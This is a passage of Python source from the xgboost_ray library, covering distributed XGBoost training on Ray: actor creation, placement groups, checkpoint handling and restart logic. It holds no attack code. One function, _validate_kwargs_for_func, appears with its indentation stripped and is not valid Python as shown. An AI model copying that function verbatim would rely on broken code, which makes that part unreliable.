                        local_params,
                        local_dtrain,
                        *args,
                        evals=local_evals,
                        evals_result=evals_result,
                        **kwargs)
                    if LEGACY_CALLBACK:
                        for xgb_callback in kwargs.get("callbacks", []):
                            if isinstance(xgb_callback, TrainingCallback):
                                xgb_callback.after_training(bst)
                    result_dict.update({
                        "bst": bst,
                        "evals_result": evals_result,
                        "train_n": self._local_n[dtrain]
                    })
            except EarlyStopException:
                # Usually this should be caught by XGBoost core.
                # Silent fail, will be raised as RayXGBoostTrainingStopped.
                return
            except XGBoostError as e:
                error_dict.update({"exception": e})
                return

        thread = threading.Thread(target=_train)
        thread.daemon = True
        thread.start()
        # Poll the training thread so we can react to the stop event.
        while thread.is_alive():
            thread.join(timeout=0)
            if self._stop_event.is_set():
                raise RayXGBoostTrainingStopped("Training was interrupted.")
            time.sleep(0.1)
        if not result_dict:
            raise_from = error_dict.get("exception", None)
            raise RayXGBoostTrainingError("Training failed.") from raise_from
        thread.join()
        self._distributed_callbacks.after_train(self, result_dict)
        if not return_bst:
            result_dict.pop("bst", None)
        return result_dict

    def predict(self, model: xgb.Booster, data: RayDMatrix, **kwargs):
        """Run local prediction on this actor's shard of ``data``."""
        self._distributed_callbacks.before_predict(self)
        _set_omp_num_threads()
        if data not in self._data:
            self.load_data(data)
        local_data = _get_dmatrix(data, self._data[data])
        predictions = model.predict(local_data, **kwargs)
        # Callbacks receive a pandas view (Series for 1-D, DataFrame
        # otherwise); the raw array is returned to the caller.
        if predictions.ndim == 1:
            callback_predictions = pd.Series(predictions)
        else:
            callback_predictions = pd.DataFrame(predictions)
        self._distributed_callbacks.after_predict(self, callback_predictions)
        return predictions
# Ray-remote wrapper around RayXGBoostActor; instantiated via
# `_create_actor()` with per-actor resource options.
@ray.remote
class _RemoteRayXGBoostActor(RayXGBoostActor):
    pass
class _PrepareActorTask(MultiActorTask):
    """Tracks the futures that prepare a (re)started actor.

    Preparation means attaching the driver queue and stop event and
    loading the given datasets onto the actor.
    """

    def __init__(self, actor: ActorHandle, queue: Queue, stop_event: Event,
                 load_data: List[RayDMatrix]):
        futures = [
            actor.set_queue.remote(queue),
            actor.set_stop_event.remote(stop_event),
        ]
        futures.extend(actor.load_data.remote(data) for data in load_data)
        super(_PrepareActorTask, self).__init__(futures)
def _autodetect_resources(ray_params: RayParams,
                          use_tree_method: bool = False) -> Tuple[int, int]:
    """Fill in default per-actor CPU/GPU counts.

    Returns a ``(cpus_per_actor, gpus_per_actor)`` tuple where the default
    sentinels (``cpus_per_actor <= 0``, ``gpus_per_actor == -1``) are
    replaced by autodetected values.
    """
    gpus_per_actor = ray_params.gpus_per_actor
    cpus_per_actor = ray_params.cpus_per_actor

    # Automatically set gpus_per_actor if left at the default value
    if gpus_per_actor == -1:
        gpus_per_actor = 1 if use_tree_method else 0

    # Automatically set cpus_per_actor if left at the default value
    # Will be set to the number of cluster CPUs divided by the number of
    # actors, bounded by the minimum number of CPUs across actors nodes.
    if cpus_per_actor <= 0:
        cluster_cpus = _ray_get_cluster_cpus() or 1
        per_actor_share = int(cluster_cpus // ray_params.num_actors)
        node_bound = int(_get_min_node_cpus() or 1)
        cpus_per_actor = max(1, min(node_bound, per_actor_share))

    return cpus_per_actor, gpus_per_actor
def _create_actor(
        rank: int,
        num_actors: int,
        num_cpus_per_actor: int,
        num_gpus_per_actor: int,
        resources_per_actor: Optional[Dict] = None,
        placement_group: Optional[PlacementGroup] = None,
        queue: Optional[Queue] = None,
        checkpoint_frequency: int = 5,
        distributed_callbacks: Optional[Sequence[DistributedCallback]] = None
) -> ActorHandle:
    """Schedule one remote RayXGBoostActor with the given resources.

    Args:
        rank: Rank of the actor within the training group.
        num_actors: Total number of training actors.
        num_cpus_per_actor: CPUs reserved for the actor.
        num_gpus_per_actor: GPUs reserved for the actor.
        resources_per_actor: Additional custom resources for the actor.
        placement_group: Placement group to schedule into (falls back to
            the default group semantics of the installed Ray version).
        queue: Driver queue handed to the actor.
        checkpoint_frequency: Checkpoint interval in boosting rounds.
        distributed_callbacks: Hooks forwarded to the actor.

    Returns:
        The handle of the newly created actor.
    """
    # Send DEFAULT_PG here, which changed in Ray >= 1.5.0
    # If we send `None`, this will ignore the parent placement group and
    # lead to errors e.g. when used within Ray Tune
    return _RemoteRayXGBoostActor.options(
        num_cpus=num_cpus_per_actor,
        num_gpus=num_gpus_per_actor,
        resources=resources_per_actor,
        placement_group_capture_child_tasks=True,
        placement_group=placement_group or DEFAULT_PG).remote(
            rank=rank,
            num_actors=num_actors,
            queue=queue,
            checkpoint_frequency=checkpoint_frequency,
            distributed_callbacks=distributed_callbacks)
def _trigger_data_load(actor, dtrain, evals):
    """Kick off async loading of the train and eval shards on an actor.

    Returns the list of load futures to wait on.
    """
    pending = [actor.load_data.remote(dtrain)]
    pending.extend(actor.load_data.remote(deval) for deval, _name in evals)
    return pending
def _handle_queue(queue: Queue, checkpoint: _Checkpoint,
                  callback_returns: Dict):
    """Handle results obtained from workers through the remote Queue object.

    Remote actors supply these results via the
    ``xgboost_ray.session.put_queue()`` function. These can be:

    - Callables. These will be called immediately with no arguments.
    - ``_Checkpoint`` objects. These will update the latest checkpoint
      object on the driver.
    - Any other type. These will be appended to an actor rank-specific
      ``callback_returns`` dict that will be written to the
      ``additional_returns`` dict of the :func:`train() <train>` method.
    """
    while not queue.empty():
        actor_rank, item = queue.get()
        if isinstance(item, _Checkpoint):
            # Overwrite the driver-side checkpoint in place.
            checkpoint.__dict__.update(item.__dict__)
        elif isinstance(item, Callable):
            item()
        else:
            callback_returns[actor_rank].append(item)
def _shutdown(actors: List[ActorHandle],
              pending_actors: Optional[Dict[int, Tuple[
                  ActorHandle, _PrepareActorTask]]] = None,
              queue: Optional[Queue] = None,
              event: Optional[Event] = None,
              placement_group: Optional[PlacementGroup] = None,
              force: bool = False):
    """Tear down training actors and auxiliary driver-side resources.

    Args:
        actors: Actor handles; entries may be None for failed actors.
        pending_actors: Actors still being prepared; also shut down.
        queue: Optional driver queue actor to shut down.
        event: Optional stop event actor to shut down.
        placement_group: Optional placement group to remove.
        force: If True, kill actors immediately instead of asking them to
            terminate gracefully first.
    """
    alive_actors = [a for a in actors if a is not None]
    if pending_actors:
        alive_actors += [a for (a, _) in pending_actors.values()]
    if force:
        for actor in alive_actors:
            ray.kill(actor)
    else:
        done_refs = [a.__ray_terminate__.remote() for a in alive_actors]
        # Wait 5 seconds for actors to die gracefully.
        done, not_done = ray.wait(done_refs, timeout=5)
        if not_done:
            # If all actors are not able to die gracefully, then kill them.
            for actor in alive_actors:
                ray.kill(actor)
    # Drop all handles so the caller's list reflects the shutdown state.
    for i in range(len(actors)):
        actors[i] = None
    if queue:
        queue.shutdown()
    if event:
        event.shutdown()
    if placement_group:
        remove_placement_group(placement_group)
def _create_placement_group(cpus_per_actor, gpus_per_actor,
                            resources_per_actor, num_actors, strategy):
    """Create (and wait for) a placement group with one bundle per actor.

    Raises:
        TimeoutError: If the group is not ready within
            ``ENV.PLACEMENT_GROUP_TIMEOUT_S`` seconds.
    """
    resources_per_bundle = {"CPU": cpus_per_actor, "GPU": gpus_per_actor}
    extra_resources_per_bundle = {} if resources_per_actor is None else \
        resources_per_actor
    # Create placement group for training worker colocation.
    bundles = [{
        **resources_per_bundle,
        **extra_resources_per_bundle
    } for _ in range(num_actors)]
    pg = placement_group(bundles, strategy=strategy)
    # Wait for placement group to get created.
    logger.debug("Waiting for placement group to start.")
    ready, _ = ray.wait([pg.ready()], timeout=ENV.PLACEMENT_GROUP_TIMEOUT_S)
    if ready:
        logger.debug("Placement group has started.")
    else:
        raise TimeoutError("Placement group creation timed out. Make sure "
                           "your cluster either has enough resources or use "
                           "an autoscaling cluster. Current resources "
                           "available: {}, resources requested by the "
                           "placement group: {}".format(
                               ray.available_resources(), pg.bundle_specs))
    return pg
def _create_communication_processes(added_tune_callback: bool = False):
    """Create the Queue and Event actors, colocated with the driver node.

    Returns a ``(queue, stop_event)`` tuple. When running under Tune with
    placement groups, both actors are forced onto the Trainable's bundle
    so all three live on the same node; otherwise they are pinned to the
    driver's node via a tiny custom-resource request.
    """
    driver_ip = get_node_ip_address()
    # Have to explicitly set num_cpus to 0 so these lightweight actors
    # never compete with training actors for CPU resources.
    options = {"num_cpus": 0}
    current_pg = None
    if added_tune_callback and TUNE_USING_PG:
        # If Tune is using placement groups, then we force Queue and
        # StopEvent onto same bundle as the Trainable.
        current_pg = get_current_placement_group()
    if current_pg is not None:
        # This forces all 3 to be on the same node.
        options["placement_group"] = current_pg
        options["placement_group_bundle_index"] = 0
    else:
        # Either not under Tune, or the user is not using Tune PGs after
        # all (e.g. via setting an environment variable): pin to driver.
        options["resources"] = {f"node:{driver_ip}": 0.01}
    return Queue(actor_options=options), Event(actor_options=options)
def _validate_kwargs_for_func(kwargs: Dict[str, Any], func: Callable,
func_name: str):
"""Raise exception if kwargs are not valid for a given function."""
sig = inspect.signature(func)
try:
sig.bind_partial(**kwargs)
except TypeError as e:
# Try to find set of invalid kwargs
valid_keys = inspect.getfullargspec(func)[0]
invalid_kwargs = [k for k in kwargs if k not in valid_keys]
raise TypeError(
f"Got invalid keyword arguments to be passed to `{func_name}`. "
f"Please check these arguments: {invalid_kwargs}") from e
@dataclass
class _TrainingState:
    """Mutable state shared across invocations of ``_train()``.

    Bundles everything that must survive actor failures and restarts
    within a single outer ``train()`` call.
    """
    # One entry per rank; ``None`` marks a dead or not-yet-created actor.
    actors: List[Optional[ActorHandle]]
    # Queue actor through which training actors report results/checkpoints.
    queue: Queue
    # Event actor used to signal all training actors to stop.
    stop_event: Event
    # Latest checkpoint received from the actors.
    checkpoint: _Checkpoint
    # Extra results (e.g. callback returns) accumulated across restarts.
    additional_results: Dict
    training_started_at: float = 0.
    placement_group: Optional[PlacementGroup] = None
    # Ranks whose actors died and should be (re-)created by ``_train()``.
    failed_actor_ranks: set = field(default_factory=set)
    # Last time we checked resources to schedule new actors
    last_resource_check_at: float = 0
    # Actors created in the background (elastic training) that are not
    # yet integrated into the training loop, keyed by rank.
    pending_actors: Dict[int, Tuple[ActorHandle, _PrepareActorTask]] = field(
        default_factory=dict)
    # If set, elastic training will attempt a restart at this timestamp.
    restart_training_at: Optional[float] = None
def _train(params: Dict,
           dtrain: RayDMatrix,
           *args,
           evals=(),
           ray_params: RayParams,
           cpus_per_actor: int,
           gpus_per_actor: int,
           _training_state: _TrainingState,
           **kwargs) -> Tuple[xgb.Booster, Dict, Dict]:
    """This is the local train function wrapped by :func:`train() <train>`.
    This function can be thought of one invocation of a multi-actor xgboost
    training run. It starts the required number of actors, triggers data
    loading, collects the results, and handles (i.e. registers) actor failures
    - but it does not handle fault tolerance or general training setup.
    Generally, this function is called one or multiple times by the
    :func:`train() <train>` function. It is called exactly once if no
    errors occur. It is called more than once if errors occurred (e.g. an
    actor died) and failure handling is enabled.

    Returns:
        Tuple of ``(booster, evals_result, additional_results)``.

    Raises:
        RayActorError: If an actor fails while preparing or training.
    """
    # Imported lazily to avoid a circular import with xgboost_ray.elastic.
    from xgboost_ray.elastic import _maybe_schedule_new_actors, \
        _update_scheduled_actor_states, _get_actor_alive_status
    # Un-schedule possible scheduled restarts
    _training_state.restart_training_at = None
    if "nthread" in params or "n_jobs" in params:
        if ("nthread" in params and params["nthread"] > cpus_per_actor) or (
                "n_jobs" in params and params["n_jobs"] > cpus_per_actor):
            raise ValueError(
                "Specified number of threads greater than number of CPUs. "
                "\nFIX THIS by passing a lower value for the `nthread` "
                "parameter or a higher number for `cpus_per_actor`.")
    else:
        # No thread count requested: give each actor all of its CPUs.
        params["nthread"] = cpus_per_actor
        params["n_jobs"] = cpus_per_actor
    # This is a callback that handles actor failures.
    # We identify the rank of the failed actor, add this to a set of
    # failed actors (which we might want to restart later), and set its
    # entry in the actor list to None.
    def handle_actor_failure(actor_id):
        rank = _training_state.actors.index(actor_id)
        _training_state.failed_actor_ranks.add(rank)
        _training_state.actors[rank] = None
    # Here we create new actors. In the first invocation of _train(), this
    # will be all actors. In future invocations, this may be less than
    # the num_actors setting, depending on the failure mode.
    newly_created = 0
    for i in list(_training_state.failed_actor_ranks):
        if _training_state.actors[i] is not None:
            raise RuntimeError(
                f"Trying to create actor with rank {i}, but it already "
                f"exists.")
        actor = _create_actor(
            rank=i,
            num_actors=ray_params.num_actors,
            num_cpus_per_actor=cpus_per_actor,
            num_gpus_per_actor=gpus_per_actor,
            resources_per_actor=ray_params.resources_per_actor,
            placement_group=_training_state.placement_group,
            queue=_training_state.queue,
            checkpoint_frequency=ray_params.checkpoint_frequency,
            distributed_callbacks=ray_params.distributed_callbacks)
        # Set actor entry in our list
        _training_state.actors[i] = actor
        # Remove from this set so it is not created again
        _training_state.failed_actor_ranks.remove(i)
        newly_created += 1
    alive_actors = sum(1 for a in _training_state.actors if a is not None)
    logger.info(f"[RayXGBoost] Created {newly_created} new actors "
                f"({alive_actors} total actors). Waiting until actors "
                f"are ready for training.")
    # For distributed datasets (e.g. Modin), this will initialize
    # (and fix) the assignment of data shards to actor ranks
    dtrain.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
    dtrain.assign_shards_to_actors(_training_state.actors)
    for deval, _ in evals:
        deval.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
        deval.assign_shards_to_actors(_training_state.actors)
    # All matrices every actor must load (train data + every eval set).
    # Note: `eval` here shadows the builtin inside the comprehension.
    load_data = [dtrain] + [eval[0] for eval in evals]
    prepare_actor_tasks = [
        _PrepareActorTask(
            actor,
            # Maybe we got a new Queue actor, so send it to all actors.
            queue=_training_state.queue,
            # Maybe we got a new Event actor, so send it to all actors.
            stop_event=_training_state.stop_event,
            # Trigger data loading
            load_data=load_data) for actor in _training_state.actors
        if actor is not None
    ]
    start_wait = time.time()
    last_status = start_wait
    try:
        # Construct list before calling any() to force evaluation
        ready_states = [task.is_ready() for task in prepare_actor_tasks]
        while not all(ready_states):
            # Periodically log that we are still waiting for the actors.
            if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
                wait_time = time.time() - start_wait
                logger.info(f"Waiting until actors are ready "
                            f"({wait_time:.0f} seconds passed).")
                last_status = time.time()
            time.sleep(0.1)
            ready_states = [task.is_ready() for task in prepare_actor_tasks]
    except Exception as exc:
        # Preparation failed: signal all actors to stop, record which
        # actors died, and surface the failure to train() for handling.
        _training_state.stop_event.set()
        _get_actor_alive_status(_training_state.actors, handle_actor_failure)
        raise RayActorError from exc
    logger.info("[RayXGBoost] Starting XGBoost training.")
    # Start Rabit tracker for gradient sharing
    rabit_process, env = _start_rabit_tracker(alive_actors)
    rabit_args = [("%s=%s" % item).encode() for item in env.items()]
    # Load checkpoint if we have one. In that case we need to adjust the
    # number of training rounds.
    if _training_state.checkpoint.value:
        kwargs["xgb_model"] = pickle.loads(_training_state.checkpoint.value)
        if _training_state.checkpoint.iteration == -1:
            # -1 means training already finished.
            # NOTE(review): this log message is missing separating spaces
            # between the concatenated string literals.
            logger.error(
                "Trying to load continue from checkpoint, but the checkpoint"
                "indicates training already finished. Returning last"
                "checkpointed model instead.")
            return kwargs["xgb_model"], {}, _training_state.additional_results
    # The callback_returns dict contains actor-rank indexed lists of
    # results obtained through the `put_queue` function, usually
    # sent via callbacks.
    callback_returns = _training_state.additional_results.get(
        "callback_returns")
    if callback_returns is None:
        callback_returns = [list() for _ in range(len(_training_state.actors))]
        _training_state.additional_results[
            "callback_returns"] = callback_returns
    _training_state.training_started_at = time.time()
    # Trigger the train function
    live_actors = [
        actor for actor in _training_state.actors if actor is not None
    ]
    training_futures = [
        actor.train.remote(
            rabit_args,
            i == 0, # return_bst
            params,
            dtrain,
            evals,
            *args,
            **kwargs) for i, actor in enumerate(live_actors)
    ]
    # Failure handling loop. Here we wait until all training tasks finished.
    # If a training task fails, we stop training on the remaining actors,
    # check which ones are still alive, and raise the error.
    # The train() wrapper function will then handle the error.
    start_wait = time.time()
    last_status = start_wait
    try:
        not_ready = training_futures
        while not_ready:
            # Drain intermediate results/checkpoints sent by the actors.
            if _training_state.queue:
                _handle_queue(
                    queue=_training_state.queue,
                    checkpoint=_training_state.checkpoint,
                    callback_returns=callback_returns)
            if ray_params.elastic_training \
                    and not ENV.ELASTIC_RESTART_DISABLED:
                _maybe_schedule_new_actors(
                    training_state=_training_state,
                    num_cpus_per_actor=cpus_per_actor,
                    num_gpus_per_actor=gpus_per_actor,
                    resources_per_actor=ray_params.resources_per_actor,
                    ray_params=ray_params,
                    load_data=load_data)
                # This may raise RayXGBoostActorAvailable
                _update_scheduled_actor_states(_training_state)
            if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
                wait_time = time.time() - start_wait
                logger.info(f"Training in progress "
                            f"({wait_time:.0f} seconds since last restart).")
                last_status = time.time()
            # Poll with a 1s timeout; ray.get(ready) re-raises any actor
            # failure here so it is caught by the except clause below.
            ready, not_ready = ray.wait(
                not_ready, num_returns=len(not_ready), timeout=1)
            ray.get(ready)
        # Get items from queue one last time
        if _training_state.queue:
            _handle_queue(
                queue=_training_state.queue,
                checkpoint=_training_state.checkpoint,
                callback_returns=callback_returns)
    # The inner loop should catch all exceptions
    except Exception as exc:
        logger.debug(f"Caught exception in training loop: {exc}")
        # Stop all other actors from training
        _training_state.stop_event.set()
        # Check which actors are still alive
        _get_actor_alive_status(_training_state.actors, handle_actor_failure)
        # Todo: Try to fetch newer checkpoint, store in `_checkpoint`
        # Shut down rabit
        _stop_rabit_tracker(rabit_process)
        raise RayActorError from exc
    # Training is now complete.
    # Stop Rabit tracking process
    _stop_rabit_tracker(rabit_process)
    # Get all results from all actors.
    all_results: List[Dict[str, Any]] = ray.get(training_futures)
    # All results should be the same because of Rabit tracking. But only
    # the first one actually returns its bst object.
    bst = all_results[0]["bst"]
    evals_result = all_results[0]["evals_result"]
    if callback_returns:
        _training_state.additional_results[
            "callback_returns"] = callback_returns
    # Total number of rows trained on, summed across actors.
    total_n = sum(res["train_n"] or 0 for res in all_results)
    _training_state.additional_results["total_n"] = total_n
    return bst, evals_result, _training_state.additional_results
@PublicAPI(stability="beta")
def train(
        params: Dict,
        dtrain: RayDMatrix,
        num_boost_round: int = 10,
        *args,
        evals: Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]] = (
        ),
        evals_result: Optional[Dict] = None,
        additional_results: Optional[Dict] = None,
        ray_params: Union[None, RayParams, Dict] = None,
        _remote: Optional[bool] = None,
        **kwargs) -> xgb.Booster:
    """Distributed XGBoost training via Ray.
    This function will connect to a Ray cluster, create ``num_actors``
    remote actors, send data shards to them, and have them train an
    XGBoost classifier. The XGBoost parameters will be shared and combined
    via Rabit's all-reduce protocol.
    If running inside a Ray Tune session, this function will automatically
    handle results to tune for hyperparameter search.
    Failure handling:
    XGBoost on Ray supports automatic failure handling that can be configured
    with the :class:`ray_params <RayParams>` argument. If an actor or local
    training task dies, the Ray actor is marked as dead, and there are
    three options on how to proceed.
    First, if ``ray_params.elastic_training`` is ``True`` and
    the number of dead actors is below ``ray_params.max_failed_actors``,
    training will continue right away with fewer actors. No data will be
    loaded again and the latest available checkpoint will be used.
    A maximum of ``ray_params.max_actor_restarts`` restarts will be tried
    before exiting.
    Second, if ``ray_params.elastic_training`` is ``False`` and
    the number of restarts is below ``ray_params.max_actor_restarts``,
    Ray will try to schedule the dead actor again, load the data shard
    on this actor, and then continue training from the latest checkpoint.
    Third, if none of the above is the case, training is aborted.
    Args:
        params (Dict): parameter dict passed to ``xgboost.train()``
        dtrain (RayDMatrix): Data object containing the training data.
        num_boost_round (int): Number of boosting iterations. Defaults
            to 10.
        evals (Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]]):
            ``evals`` tuple passed to ``xgboost.train()``.
        evals_result (Optional[Dict]): Dict to store evaluation results in.
        additional_results (Optional[Dict]): Dict to store additional results.
        ray_params (Union[None, RayParams, Dict]): Parameters to configure
            Ray-specific behavior. See :class:`RayParams` for a list of valid
            configuration parameters.
        _remote (bool): Whether to run the driver process in a remote
            function. This is enabled by default in Ray client mode.
        **kwargs: Keyword arguments will be passed to the local
            `xgb.train()` calls.
    Returns: An ``xgboost.Booster`` object.
    """
    os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
    if xgb is None:
        raise ImportError(
            "xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
            "FIX THIS by running `pip install \"xgboost-ray\"`.")
    if _remote is None:
        # Default to remote execution when connected via the Ray client
        # and not already inside a Tune session.
        _remote = _is_client_connected() and \
            not is_session_enabled()
    if not ray.is_initialized():
        ray.init()
    if _remote:
        # Run this function as a remote function to support Ray client mode.
        @ray.remote(num_cpus=0)
        def _wrapped(*args, **kwargs):
            _evals_result = {}
            _additional_results = {}
            bst = train(
                *args,
                num_boost_round=num_boost_round,
                evals_result=_evals_result,
                additional_results=_additional_results,
                **kwargs)
            return bst, _evals_result, _additional_results
        # Make sure that train is called on the server node.
        _wrapped = force_on_current_node(_wrapped)
        bst, train_evals_result, train_additional_results = ray.get(
            _wrapped.remote(
                params,
                dtrain,
                *args,
                evals=evals,
                ray_params=ray_params,
                _remote=False,
                **kwargs,
            ))
        # Copy remote results back into the caller-provided dicts.
        if isinstance(evals_result, dict):
            evals_result.update(train_evals_result)
        if isinstance(additional_results, dict):
            additional_results.update(train_additional_results)
        return bst
    _maybe_print_legacy_warning()
    # may raise TypeError
    _validate_kwargs_for_func(kwargs, xgb.train, "xgb.train()")
    start_time = time.time()
    ray_params = _validate_ray_params(ray_params)
    # A negative max_actor_restarts means "retry forever".
    max_actor_restarts = ray_params.max_actor_restarts \
        if ray_params.max_actor_restarts >= 0 else float("inf")
    _assert_ray_support()
    if not isinstance(dtrain, RayDMatrix):
        raise ValueError(
            "The `dtrain` argument passed to `train()` is not a RayDMatrix, "
            "but of type {}. "
            "\nFIX THIS by instantiating a RayDMatrix first: "
            "`dtrain = RayDMatrix(data=data, label=label)`.".format(
                type(dtrain)))
    added_tune_callback = _try_add_tune_callback(kwargs)
    # Tune currently does not support elastic training.
    if added_tune_callback and ray_params.elastic_training and not bool(
            os.getenv("RXGB_ALLOW_ELASTIC_TUNE", "0")):
        raise ValueError("Elastic Training cannot be used with Ray Tune. "
                         "Please disable elastic_training in RayParams in "
                         "order to use xgboost_ray with Tune.")
    if added_tune_callback:
        # Don't autodetect resources when used with Tune.
        cpus_per_actor = ray_params.cpus_per_actor
        gpus_per_actor = max(0, ray_params.gpus_per_actor)
    else:
        cpus_per_actor, gpus_per_actor = _autodetect_resources(
            ray_params=ray_params,
            use_tree_method="tree_method" in params
            and params["tree_method"] is not None
            and params["tree_method"].startswith("gpu"))
    tree_method = params.get("tree_method", "auto") or "auto"
    # preemptively raise exceptions with bad params
    if tree_method == "exact":
        raise ValueError(
            "`exact` tree method doesn't support distributed training.")
    if params.get("updater", None) == "grow_colmaker":
        raise ValueError(
            "`grow_colmaker` updater doesn't support distributed training.")
    if gpus_per_actor > 0 and not tree_method.startswith("gpu_"):
        warnings.warn(
            f"GPUs have been assigned to the actors, but the current XGBoost "
            f"tree method is set to `{tree_method}`. Thus, GPUs will "
            f"currently not be used. To enable GPUs usage, please set the "
            f"`tree_method` to a GPU-compatible option, "
            f"e.g. `gpu_hist`.")
    if gpus_per_actor == 0 and cpus_per_actor == 0:
        raise ValueError("cpus_per_actor and gpus_per_actor both cannot be "
                         "0. Are you sure your cluster has CPUs available?")
    if ray_params.elastic_training and ray_params.max_failed_actors == 0:
        raise ValueError(
            "Elastic training enabled but the maximum number of failed "
            "actors is set to 0. This means that elastic training is "
            "effectively disabled. Please set `RayParams.max_failed_actors` "
            "to something larger than 0 to enable elastic training.")
    if ray_params.elastic_training and ray_params.max_actor_restarts == 0:
        raise ValueError(
            "Elastic training enabled but the maximum number of actor "
            "restarts is set to 0. This means that elastic training is "
            "effectively disabled. Please set `RayParams.max_actor_restarts` "
            "to something larger than 0 to enable elastic training.")
    if not dtrain.has_label:
        raise ValueError(
            "Training data has no label set. Please make sure to set "
            "the `label` argument when initializing `RayDMatrix()` "
            "for data you would like to train on.")
    # Centralized (non-distributed) data is loaded once on the driver.
    if not dtrain.loaded and not dtrain.distributed:
        dtrain.load_data(ray_params.num_actors)
    for (deval, _name) in evals:
        if not deval.has_label:
            raise ValueError(
                "Evaluation data has no label set. Please make sure to set "
                "the `label` argument when initializing `RayDMatrix()` "
                "for data you would like to evaluate on.")
        if not deval.loaded and not deval.distributed:
            deval.load_data(ray_params.num_actors)
    bst = None
    train_evals_result = {}
    train_additional_results = {}
    tries = 0
    checkpoint = _Checkpoint() # Keep track of latest checkpoint
    current_results = {} # Keep track of additional results
    actors = [None] * ray_params.num_actors # All active actors
    pending_actors = {}
    # Create the Queue and Event actors.
    queue, stop_event = _create_communication_processes(added_tune_callback)
    placement_strategy = None
    if not ray_params.elastic_training:
        if added_tune_callback:
            if TUNE_USING_PG:
                # If Tune is using placement groups, then strategy has already
                # been set. Don't create an additional placement_group here.
                placement_strategy = None
            else:
                placement_strategy = "PACK"
        elif bool(ENV.USE_SPREAD_STRATEGY):
            placement_strategy = "SPREAD"
    if placement_strategy is not None:
        pg = _create_placement_group(cpus_per_actor, gpus_per_actor,
                                     ray_params.resources_per_actor,
                                     ray_params.num_actors, placement_strategy)
    else:
        pg = None
    start_actor_ranks = set(range(ray_params.num_actors)) # Start these
    total_training_time = 0.
    boost_rounds_left = num_boost_round
    last_checkpoint_value = checkpoint.value
    # Retry loop: each iteration is one _train() attempt, resuming from
    # the latest checkpoint after a failure.
    while tries <= max_actor_restarts:
        # Only update number of iterations if the checkpoint changed
        # If it didn't change, we already subtracted the iterations.
        if checkpoint.iteration >= 0 and \
                checkpoint.value != last_checkpoint_value:
            boost_rounds_left -= checkpoint.iteration + 1
        last_checkpoint_value = checkpoint.value
        logger.debug(f"Boost rounds left: {boost_rounds_left}")
        training_state = _TrainingState(
            actors=actors,
            queue=queue,
            stop_event=stop_event,
            checkpoint=checkpoint,
            additional_results=current_results,
            training_started_at=0.,
            placement_group=pg,
            failed_actor_ranks=start_actor_ranks,
            pending_actors=pending_actors)
        try:
            bst, train_evals_result, train_additional_results = _train(
                params,
                dtrain,
                boost_rounds_left,
                *args,
                evals=evals,
                ray_params=ray_params,
                cpus_per_actor=cpus_per_actor,
                gpus_per_actor=gpus_per_actor,
                _training_state=training_state,
                **kwargs)
            if training_state.training_started_at > 0.:
                total_training_time += time.time(
                ) - training_state.training_started_at
            break
        except (RayActorError, RayTaskError) as exc:
            # Account for the time spent before the failure.
            if training_state.training_started_at > 0.:
                total_training_time += time.time(
                ) - training_state.training_started_at
            alive_actors = sum(1 for a in actors if a is not None)
            start_again = False
            if ray_params.elastic_training:
                if alive_actors < ray_params.num_actors - \
                        ray_params.max_failed_actors:
                    raise RuntimeError(
                        "A Ray actor died during training and the maximum "
                        "number of dead actors in elastic training was "
                        "reached. Shutting down training.") from exc
                # Do not start new actors before resuming training
                # (this might still restart actors during training)
                start_actor_ranks.clear()
                if exc.__cause__ and isinstance(exc.__cause__,
                                                RayXGBoostActorAvailable):
                    # New actor available, integrate into training loop
                    logger.info(
                        f"A new actor became available. Re-starting training "
                        f"from latest checkpoint with new actor. "
                        f"This will use {alive_actors} existing actors and "
                        f"start {len(start_actor_ranks)} new actors. "
                        f"Sleeping for 10 seconds for cleanup.")
                    tries -= 1 # This is deliberate so shouldn't count
                    start_again = True
                elif tries + 1 <= max_actor_restarts:
                    # Elastic: continue with the surviving actors only.
                    if exc.__cause__ and isinstance(exc.__cause__,
                                                    RayXGBoostTrainingError):
                        logger.warning(f"Caught exception: {exc.__cause__}")
                    logger.warning(
                        f"A Ray actor died during training. Trying to "
                        f"continue training on the remaining actors. "
                        f"This will use {alive_actors} existing actors and "
                        f"start {len(start_actor_ranks)} new actors. "
                        f"Sleeping for 10 seconds for cleanup.")
                    start_again = True
            elif tries + 1 <= max_actor_restarts:
                # Non-elastic: re-schedule the dead actor(s) and resume
                # from the latest checkpoint.
                if exc.__cause__ and isinstance(exc.__cause__,
                                                RayXGBoostTrainingError):
                    logger.warning(f"Caught exception: {exc.__cause__}")
                logger.warning(
                    f"A Ray actor died during training. Trying to restart "
                    f"and continue training from last checkpoint "
                    f"(restart {tries + 1} of {max_actor_restarts}). "
                    f"This will use {alive_actors} existing actors and start "
                    f"{len(start_actor_ranks)} new actors. "
                    f"Sleeping for 10 seconds for cleanup.")
                start_again = True
            if start_again:
                # Recreate the communication actors (5s + 5s = the "10
                # seconds for cleanup" mentioned in the log messages).
                time.sleep(5)
                queue.shutdown()
                stop_event.shutdown()
                time.sleep(5)
                # NOTE(review): `added_tune_callback` is not passed here,
                # so restarted Queue/Event actors may be placed differently
                # than the initial ones under Tune — confirm intended.
                queue, stop_event = _create_communication_processes()
            else:
                raise RuntimeError(
                    f"A Ray actor died during training and the maximum number "
                    f"of retries ({max_actor_restarts}) is exhausted."
                ) from exc
        tries += 1
    total_time = time.time() - start_time
    train_additional_results["training_time_s"] = total_training_time
    train_additional_results["total_time_s"] = total_time
    logger.info("[RayXGBoost] Finished XGBoost training on training data "
                "with total N={total_n:,} in {total_time_s:.2f} seconds "
                "({training_time_s:.2f} pure XGBoost training time).".format(
                    **train_additional_results))
    _shutdown(
        actors=actors,
        pending_actors=pending_actors,
        queue=queue,
        event=stop_event,
        placement_group=pg,
        force=False)
    # Copy results into the caller-provided dicts, if any.
    if isinstance(evals_result, dict):
        evals_result.update(train_evals_result)
    if isinstance(additional_results, dict):
        additional_results.update(train_additional_results)
    return bst
def _predict(model: xgb.Booster, data: RayDMatrix, ray_params: RayParams,
             **kwargs):
    """Run one distributed prediction attempt across fresh remote actors.

    Creates the actors, loads the data shards, broadcasts the model via
    the object store, collects per-shard predictions, and shuts the
